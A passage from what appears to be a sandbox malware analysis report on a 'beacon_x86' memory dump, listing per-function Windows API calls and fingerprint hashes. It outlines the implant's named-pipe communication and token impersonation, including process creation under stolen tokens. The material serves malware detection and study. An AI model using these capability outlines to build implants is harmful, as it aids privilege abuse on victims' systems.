          • Opcode Fuzzy Hash: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
          • Instruction Fuzzy Hash: 153121B01046008AE7206FA6864C32F76D0AB45328F154B6FE9E4EB3D1CBFDC985971B
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
          • String ID:
          • API String ID: 3886058894-0
          • Opcode ID: fc4aebe1cb34a72d3de3024db9cb425edac2f1df6bf6b8858243bc231b182162
          • Instruction ID: 545dfa2d2fbfacd36a67fb833037c7cd2b83de14fa4ce61e226090d79a24b1e7
          • Opcode Fuzzy Hash: fc4aebe1cb34a72d3de3024db9cb425edac2f1df6bf6b8858243bc231b182162
          • Instruction Fuzzy Hash: F6519771A40205EBCB219F69C84C5AEBBB5EF41320F18C65AF46D92191FB309E51EF71
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$_malloc$_rand
          • String ID:
          • API String ID: 2453798774-0
          • Opcode ID: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
          • Instruction ID: 2537d77829da40f82ac6f061b41036c4293bbe7e37b8e5bf98343f7cc2f9bb85
          • Opcode Fuzzy Hash: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
          • Instruction Fuzzy Hash: B6513830A00605BFDB119F78EC55BEE7BB8DF5A300F188095F884AB256EA35DE4587B4
          APIs
          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000), ref: 00D669DF
          • GetLastError.KERNEL32 ref: 00D669EC
          • WaitNamedPipeA.KERNEL32(?,00002710), ref: 00D66A01
          • Sleep.KERNEL32(000003E8), ref: 00D66A0E
          • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 00D66A58
          • GetLastError.KERNEL32 ref: 00D66A62
          • DisconnectNamedPipe.KERNEL32(?), ref: 00D66A9C
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleSleepStateWait
          • String ID:
          • API String ID: 3284586969-0
          • Opcode ID: d53fee6211f6194c8641b03e66f7d41a08309ea97e4588ae0a953624b38dbd0e
          • Instruction ID: 5d81bebe430e1f6bc318f1b2bb2c8bc1028a50ef1b83a23c456b7f3e09a5a20c
          • Opcode Fuzzy Hash: d53fee6211f6194c8641b03e66f7d41a08309ea97e4588ae0a953624b38dbd0e
          • Instruction Fuzzy Hash: 7C21D3316503047BFB116BF8EC8AB7D7AADEB04720F284426FA06F61D0DA71D84047B2
          APIs
          • GetLastError.KERNEL32 ref: 00D6D68B
          • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 00D6D6A9
          • GetLastError.KERNEL32 ref: 00D6D6B3
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast$OpenProcessToken
          • String ID:
          • API String ID: 2009710997-0
          • Opcode ID: cdcb30a5114e4d5c2a4a6fe674b4102f78014cfacb6d622d30e1538f62a0ab75
          • Instruction ID: 727921c288380dd8d2a30061c6ae02959d77dec5d237ac8a4f6c8419be7efc41
          • Opcode Fuzzy Hash: cdcb30a5114e4d5c2a4a6fe674b4102f78014cfacb6d622d30e1538f62a0ab75
          • Instruction Fuzzy Hash: F3216F76F50204BBF7116BE4EC4AF7A766DEB04B49F1C0125F605D1191E6788D109772
          APIs
          • _memset.LIBCMT ref: 00D6312F
          • GetLastError.KERNEL32 ref: 00D63142
          • ReadFile.KERNEL32(?,00000001,?,00000000), ref: 00D63170
          • ImpersonateNamedPipeClient.ADVAPI32 ref: 00D63180
          • GetCurrentThread.KERNEL32 ref: 00D63195
          • OpenThreadToken.ADVAPI32(00000000), ref: 00D6319C
          • DisconnectNamedPipe.KERNEL32(00D95024), ref: 00D631B0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipeThread$ClientCurrentDisconnectErrorFileImpersonateLastOpenReadToken_memset
          • String ID:
          • API String ID: 1184232734-0
          • Opcode ID: 0d2a3aeee3a2bdd6c850d488570fa7b668385f5ea72078fe0e5c71700a349a89
          • Instruction ID: f98e03205d366761067a9179ed126bf9a46f692e78baf179a3173217cecbe5bc
          • Opcode Fuzzy Hash: 0d2a3aeee3a2bdd6c850d488570fa7b668385f5ea72078fe0e5c71700a349a89
          • Instruction Fuzzy Hash: DD118271A00309AFEB119F68ED89E6A37BCEB05745F084072B604D6269D738CE449BB1
          APIs
            • Part of subcall function 00D694B4: GetCurrentProcess.KERNEL32(?,00D6547C,?,00D654D4), ref: 00D694C0
          • GetLastError.KERNEL32(?,00000000,?,?), ref: 00D6365F
          • _malloc.LIBCMT ref: 00D636CA
          • _memset.LIBCMT ref: 00D636DB
          • _memset.LIBCMT ref: 00D6370C
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D6373C
          • _memset.LIBCMT ref: 00D63751
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$ErrorLast$CurrentProcess_malloc
          • String ID:
          • API String ID: 2196066725-0
          • Opcode ID: e9383d1034ce72ee3c758c73eb88df4073a34b887449eb6a9eec6c1a1df0fb8b
          • Instruction ID: 3d9bbe62ed52b21f1a5c720df2632360466f30b65ef9cae01ca5018cacfe8013
          • Opcode Fuzzy Hash: e9383d1034ce72ee3c758c73eb88df4073a34b887449eb6a9eec6c1a1df0fb8b
          • Instruction Fuzzy Hash: 9541AEB6A00105BFEB00ABE8DC02ABE77BDEF04710F180065FA08E9192FB359A519775
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLastSleep$BuffersDisconnectFileFlushNamedPipe
          • String ID:
          • API String ID: 1974096663-0
          • Opcode ID: b58c480f18bc1fe4d69d6ce442f71497940a70b9080efa833bd8bb62bec43316
          • Instruction ID: 9fef6ecb5b2ce39dd7d8b7f0db388ac292e13e0fabe65f2f4318c4f43a5e5f30
          • Opcode Fuzzy Hash: b58c480f18bc1fe4d69d6ce442f71497940a70b9080efa833bd8bb62bec43316
          • Instruction Fuzzy Hash: 12311E72D0021DAFEB01EBE4DC89EEEB778EB14710F144062E905E6250DB71AE49DBB1
          APIs
          • __time64.LIBCMT ref: 00D6BB28
            • Part of subcall function 00D78E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D6BB2D,00000000,00000080,?,?,?,00D603F0,?,00000000,00000000,00000000,00000000), ref: 00D78E99
            • Part of subcall function 00D78E8E: __aulldiv.LIBCMT ref: 00D78EB9
            • Part of subcall function 00D77C0A: __getptd.LIBCMT ref: 00D77C0F
          • _malloc.LIBCMT ref: 00D6BB71
          • _memset.LIBCMT ref: 00D6BB8F
          • _strtok.LIBCMT ref: 00D6BBB4
          • _strtok.LIBCMT ref: 00D6BBD7
          • _strtok.LIBCMT ref: 00D6BBE6
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _strtok$Time$FileSystem__aulldiv__getptd__time64_malloc_memset
          • String ID:
          • API String ID: 3072773955-0
          • Opcode ID: 4c8f8e739990ee379dba2d1cf3edea7c737eba4bbc833876df277790f507886d
          • Instruction ID: 88a7a0d1c436ec7e95c3cbbc02477ccb5f8901f9a2c672b9f111edfe239266dd
          • Opcode Fuzzy Hash: 4c8f8e739990ee379dba2d1cf3edea7c737eba4bbc833876df277790f507886d
          • Instruction Fuzzy Hash: 1F21D1B11047056FD729DF3CD886AB7BBE8EB05320B00446EF89AC7245EB31E9098B71
          APIs
          • _memset.LIBCMT ref: 00D64EFC
          • _memset.LIBCMT ref: 00D64F08
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650C4
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650CF
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650DB
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650E6
            • Part of subcall function 00D65072: _rand.LIBCMT ref: 00D65144
          • __snprintf.LIBCMT ref: 00D64F59
          • __snprintf.LIBCMT ref: 00D64F71
          • _memset.LIBCMT ref: 00D64F90
          • _memset.LIBCMT ref: 00D64F9B
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$__snprintf_malloc$_rand
          • String ID:
          • API String ID: 1876596931-0
          • Opcode ID: cce1e1509f504b0f6cc4662c703f403171f67815652621ef42ac83140a419f6b
          • Instruction ID: 7f6d705f0b06df3fbfc42b3cb1313fb26bbd213981e0afa3432ae324d28e0361
          • Opcode Fuzzy Hash: cce1e1509f504b0f6cc4662c703f403171f67815652621ef42ac83140a419f6b
          • Instruction Fuzzy Hash: D2215872501100BBDF25AF14DC82F5B3B69EF91710F248095FE046B296E671EE21CAB5
          APIs
          • _memset.LIBCMT ref: 00D6CF89
          • _memset.LIBCMT ref: 00D6CF97
          • _memset.LIBCMT ref: 00D6CFA5
          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 00D6CFC2
          • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00D6CFF1
          • __snprintf.LIBCMT ref: 00D6D013
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$AccountInformationLookupToken__snprintf
          • String ID:
          • API String ID: 2009363630-0
          • Opcode ID: e50347e6bd1e33cefeb576eadbabec640bdae93920ce3208dee02c2e6e64ae31
          • Instruction ID: 19e6c57b3f1534ff696a128031149c240cec7f3e39e9f5d9ae705c107f85f391
          • Opcode Fuzzy Hash: e50347e6bd1e33cefeb576eadbabec640bdae93920ce3208dee02c2e6e64ae31
          • Instruction Fuzzy Hash: 9D21FCB291121CBADB11DF90DC85EEF77BCEB04744F0488BAB615E2141E674AB848B75
          APIs
          • _memset.LIBCMT ref: 00D6389E
          • _memset.LIBCMT ref: 00D638BA
          • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C3E8296A,83FFFFDB), ref: 00D63946
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$CreateProcessTokenWith
          • String ID: system32
          • API String ID: 355399865-3483537008
          • Opcode ID: 3d9b42e758330d8c56eeed8bfff3dab35239f7646e0282856f83dbf5375b0445
          • Instruction ID: 688c9c009741edde6b29203e7ef3fc6e61ef4f65c8d137e8ef9b0004fffb3658
          • Opcode Fuzzy Hash: 3d9b42e758330d8c56eeed8bfff3dab35239f7646e0282856f83dbf5375b0445
          • Instruction Fuzzy Hash: 23510772604305AFD7219FA8DC85EAB77E9EF95700F18082AF589C3251E771DA088F72
          APIs
          • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,00D63994,C3E8296A,83FFFFDB,00D8A190,00D63ACB), ref: 00D63795
          • GetLastError.KERNEL32 ref: 00D637A7
          • _memset.LIBCMT ref: 00D637F0
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateErrorLastLogonProcessWith_memset
          • String ID: system32
          • API String ID: 2584212486-3483537008
          • Opcode ID: 251e63137930261fe7bc4555151b4f49d5251ba905ae28ffa97f8563d0cb47bb
          • Instruction ID: 82fc943b23b9138e04d414e887422abd4a09dfa9a3f63db9592b08a8663d5c0b
          • Opcode Fuzzy Hash: 251e63137930261fe7bc4555151b4f49d5251ba905ae28ffa97f8563d0cb47bb
          • Instruction Fuzzy Hash: 05312876900210AFDB125F64EC09FE63BB9EF49300F188465F989DB261E671DA14CBB0
          APIs
          • htonl.WS2_32(00000000), ref: 00D62982
          • htonl.WS2_32(?), ref: 00D6298D
          • _malloc.LIBCMT ref: 00D629A4
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D629FD
            • Part of subcall function 00D6B0FD: __snprintf.LIBCMT ref: 00D6B13C
            • Part of subcall function 00D6B0FD: __snprintf.LIBCMT ref: 00D6B14E
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
          • String ID: zyxwvutsrqponmlk
          • API String ID: 1734027086-3884694604
          • Opcode ID: 1bc122aa1f58f62c1e516944a3cf71b7879a15ac3800d79af22412d59533432e
          • Instruction ID: a799112727418174fa24ba33442724eb0e68a436ef2e80d86b3e09ac77a2aa46
          • Opcode Fuzzy Hash: 1bc122aa1f58f62c1e516944a3cf71b7879a15ac3800d79af22412d59533432e
          • Instruction Fuzzy Hash: F5213A62E4060177D7203AB59C87B7F7FD8DF85330F24057AF959E7283EA24890146B5
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintfhtonl
          • String ID:
          • API String ID: 3121112697-0
          • Opcode ID: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
          • Instruction ID: ac952cf596975460d39df2b56b69c32cb92e4dc34351f9bef7765b13b3d011dd
          • Opcode Fuzzy Hash: eab78c14c4d6226c87d263ad8f6ee971a065a19c0f412d9def1dadf1496e4146
          • Instruction Fuzzy Hash: E8118176801118BBDB11AFA4CC42EEF7B6DEF44350F144466F90496102F6309B01CBB5
          APIs
          • _memset.LIBCMT ref: 00D64FC6
          • _memset.LIBCMT ref: 00D64FD2
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650C4
            • Part of subcall function 00D65072: _malloc.LIBCMT ref: 00D650CF
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650DB
            • Part of subcall function 00D65072: _memset.LIBCMT ref: 00D650E6
            • Part of subcall function 00D65072: _rand.LIBCMT ref: 00D65144
          • __snprintf.LIBCMT ref: 00D6502E
          • _memset.LIBCMT ref: 00D6504C
          • _memset.LIBCMT ref: 00D65057
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$_malloc$__snprintf_rand
          • String ID:
          • API String ID: 4266533377-0
          • Opcode ID: cde045e9b4a518eb2f0bfecb2e13c26cd05ba3549c091f30445d61c446199dd3
          • Instruction ID: c3f52078dd835b4064d8a97591e241135356fe9bfea44f78093953094779060a
          • Opcode Fuzzy Hash: cde045e9b4a518eb2f0bfecb2e13c26cd05ba3549c091f30445d61c446199dd3
          • Instruction Fuzzy Hash: 9921C071900111BBCF25AF14DC46E4B3B65EF91710F248090FD046B29AE671EE61C7F1
          APIs
          • GetLastError.KERNEL32(?,00D662A9,00D627B2,00000000,?,00D627B2,?), ref: 00D661EC
          • WaitNamedPipeA.KERNEL32(00D627B2,00002710), ref: 00D66201
          • SetNamedPipeHandleState.KERNEL32(?,00D627B2,00000000,00000000,?,00D662A9,00D627B2,00000000,?,00D627B2,?), ref: 00D6622F
          • DisconnectNamedPipe.KERNEL32(?,?,00D662A9,00D627B2,00000000,?,00D627B2,?), ref: 00D6623B
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipe$DisconnectErrorHandleLastStateWait
          • String ID:
          • API String ID: 2058620245-0
          • Opcode ID: 21ffef03fccb3fc260f3d00fd80c84950a27655b3837f8c36e8fd7258b9ed7b8
          • Instruction ID: 13dab11660ddce4174ab2ec367e8cd27b9b1bf99633e76f3769c283d39aa0dac
          • Opcode Fuzzy Hash: 21ffef03fccb3fc260f3d00fd80c84950a27655b3837f8c36e8fd7258b9ed7b8
          • Instruction Fuzzy Hash: 991161B1220210BFFB115B68DC19F7B3AADEB4A714F100566B906D61A4E670DD409B75
          APIs
          • __getptd.LIBCMT ref: 00D7FB2A
            • Part of subcall function 00D7C797: __getptd_noexit.LIBCMT ref: 00D7C79A
            • Part of subcall function 00D7C797: __amsg_exit.LIBCMT ref: 00D7C7A7
          • __amsg_exit.LIBCMT ref: 00D7FB4A
          • __lock.LIBCMT ref: 00D7FB5A
          • InterlockedDecrement.KERNEL32(?), ref: 00D7FB77
          • InterlockedIncrement.KERNEL32(00D94B98), ref: 00D7FBA2
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
          • String ID:
          • API String ID: 4271482742-0
          • Opcode ID: 3248305179616a33d10f58f7afbdab3b34a640fe8f2d7e316897787e78d71c5f
          • Instruction ID: 82646945bde1b9d588b473eee7cdedf1e0fff0c271368bab8ce6308782bb646e
          • Opcode Fuzzy Hash: 3248305179616a33d10f58f7afbdab3b34a640fe8f2d7e316897787e78d71c5f
          • Instruction Fuzzy Hash: C0018032905711EBDB31AB68D856B5DB760FF04724F198026E81CA7381EB38E941CBF6
          APIs
          • _malloc.LIBCMT ref: 00D6DC76
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _malloc.LIBCMT ref: 00D6DC83
          • _malloc.LIBCMT ref: 00D6DC9E
          • __snprintf.LIBCMT ref: 00D6DCB1
          • _malloc.LIBCMT ref: 00D6DCD0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$AllocateHeap__snprintf
          • String ID:
          • API String ID: 3929630252-0
          • Opcode ID: 46a10f34c61c9f158cd838bfac093e5130d5b1043cba3970bd40d9bc6f0fa515
          • Instruction ID: c0d451d105c0ee3162f752e5ee9830a06e9001cf67445b89e0f9adfcfa3c6565
          • Opcode Fuzzy Hash: 46a10f34c61c9f158cd838bfac093e5130d5b1043cba3970bd40d9bc6f0fa515
          • Instruction Fuzzy Hash: 6B016D709043056FDB14AF79D986E56BBE8EF44754B00C829F48DCB241EA71D9058BB0
          APIs
          • __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D798AA: __mtinitlocknum.LIBCMT ref: 00D798C0
            • Part of subcall function 00D798AA: __amsg_exit.LIBCMT ref: 00D798CC
            • Part of subcall function 00D798AA: RtlEnterCriticalSection.NTDLL(?), ref: 00D798D4
          • ___sbh_find_block.LIBCMT ref: 00D7774B
          • ___sbh_free_block.LIBCMT ref: 00D7775A
          • HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
          • GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
          • String ID:
          • API String ID: 2714421763-0
          • Opcode ID: 6ce2192171226e7b61eec90b42679239f748312574d3ec5f9311f2350a1a71bd
          • Instruction ID: ede6c3cca426c0dfeaf37b295c8f8927b0828aa93879dd175954d9fcfe1303e5
          • Opcode Fuzzy Hash: 6ce2192171226e7b61eec90b42679239f748312574d3ec5f9311f2350a1a71bd
          • Instruction Fuzzy Hash: 7B018632809311AAEF247FB9DC4AB5E7664EF01721F25C619F51CA61D1FB3889408BB5
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __snprintf$_strncmp
          • String ID: abcdefghijklmnop
          • API String ID: 3493850238-2486878355
          • Opcode ID: cadd0649b7511afc3f582be360ae88b7272fd716075811e8239e39d1ab1c2b9c
          • Instruction ID: 9c674bbe0571e5d6bf8951c69bf8bfcd58f932b4857b449fb9f470301739735e
          • Opcode Fuzzy Hash: cadd0649b7511afc3f582be360ae88b7272fd716075811e8239e39d1ab1c2b9c
          • Instruction Fuzzy Hash: 8741B172900609BFEB01DEB8D9418EFB7B9DF49354B104932EA05E7151FB35AF098AB1
          APIs
          • GetCurrentProcess.KERNEL32(00000080,?,00D60D9E,00D9EFA8,00000000,00000000,00000001,?,?,00D6CE6B,00000000,00000001,00000000,00000000,00000080,00D606C4), ref: 00D6CAAF
          • GetCurrentProcess.KERNEL32(00000080,00D9EFA8,?,00D60D9E,00D9EFA8,00000000,00000000,00000001,?,?,00D6CE6B,00000000,00000001,00000000,00000000,00000080), ref: 00D6CACA
          • UnmapViewOfFile.KERNEL32(00000080,?,00D60D9E,00D9EFA8,00000000,00000000,00000001,?,?,00D6CE6B,00000000,00000001,00000000,00000000,00000080,00D606C4), ref: 00D6CAD9
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentProcess$FileUnmapView
          • String ID: 0-Fw
          • API String ID: 1078562510-2310602258
          • Opcode ID: a8878e471d6c314100dd7d8cbf16bbbfc6d6a2f57ec12e7aad5e86f85094db18
          • Instruction ID: ac169ef7cee2e01c8e6579b94d75985d79177178e1497c1d971d51675ab90c35
          • Opcode Fuzzy Hash: a8878e471d6c314100dd7d8cbf16bbbfc6d6a2f57ec12e7aad5e86f85094db18
          • Instruction Fuzzy Hash: 6AF03C719503099BDB24DFE9EC0857A3BA9FB15760B18542AE849C3760E7349880DB74
          APIs
          • GetLastError.KERNEL32(?,00000000,00000080,?,?,00D6458E,00D971B0,00000000), ref: 00D61036
            • Part of subcall function 00D6C9B2: GetCurrentProcess.KERNEL32(000F003F,00000000,00000000,?,00000000,00000001,00000000,D78B5955,00000000,?,?,00D60FCE,00000000,000F003F,?,00000000), ref: 00D6CA21
          • _memset.LIBCMT ref: 00D611A8
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentErrorLastProcess_memset
          • String ID:
          • API String ID: 652633832-0
          • Opcode ID: 11d65d0a39f539857edb756def5bb7571a6be9da2698ae1a2df49202792d8bdd
          • Instruction ID: 5cee0d3b52ae1c24a33967174b2957f304be2e9b04028867cdb82ac82952a402
          • Opcode Fuzzy Hash: 11d65d0a39f539857edb756def5bb7571a6be9da2698ae1a2df49202792d8bdd
          • Instruction Fuzzy Hash: 08C1AAB6A107059FEB20CF69CC81A5777E4FF88304B18893EE586C6A52E735F8558B30
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
            • Part of subcall function 00D78218: __fsopen.LIBCMT ref: 00D78225
          • _fseek.LIBCMT ref: 00D63D43
            • Part of subcall function 00D78852: __lock_file.LIBCMT ref: 00D78861
            • Part of subcall function 00D78852: __ftelli64_nolock.LIBCMT ref: 00D7886E
          • _fseek.LIBCMT ref: 00D63D5C
            • Part of subcall function 00D78BE3: __lock_file.LIBCMT ref: 00D78C2E
            • Part of subcall function 00D78BE3: __fseek_nolock.LIBCMT ref: 00D78C3E
          • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 00D63D89
          • _malloc.LIBCMT ref: 00D63DA3
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
          • String ID:
          • API String ID: 73014519-0
          • Opcode ID: 07eb45547dc79605c8d1b99d8f389948e66eefbd722112ae5b0fd9bc11e52801
          • Instruction ID: 98cf07bab3d6218a46d768dc0bef741341b5c7bd7f093d516768e897f3c58bad
          • Opcode Fuzzy Hash: 07eb45547dc79605c8d1b99d8f389948e66eefbd722112ae5b0fd9bc11e52801
          • Instruction Fuzzy Hash: DC41A472900308BBDF11BBA4CC86F9EBBB8EF08714F14452AF514B2292EA7596549B71
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7f556dcf93ce286b31de40d13774e92fbb0981c873ca301f553f8a3c697044a6
          • Instruction ID: a2a31d4df63dc539ad20373795f8365041ac073e8a58b3a5808173bd848b4b2f
          • Opcode Fuzzy Hash: 7f556dcf93ce286b31de40d13774e92fbb0981c873ca301f553f8a3c697044a6
          • Instruction Fuzzy Hash: 53418F76C04109BBDF01BFE4DC42DEEBBB8EF44324F144026F814A6252EB359A54ABB4
          APIs
          • __flush.LIBCMT ref: 00D782F3
          • __fileno.LIBCMT ref: 00D78313
          • __locking.LIBCMT ref: 00D7831A
          • __flsbuf.LIBCMT ref: 00D78345
            • Part of subcall function 00D79641: __getptd_noexit.LIBCMT ref: 00D79641
            • Part of subcall function 00D7B5DA: __decode_pointer.LIBCMT ref: 00D7B5E5
          Memory Dump Source
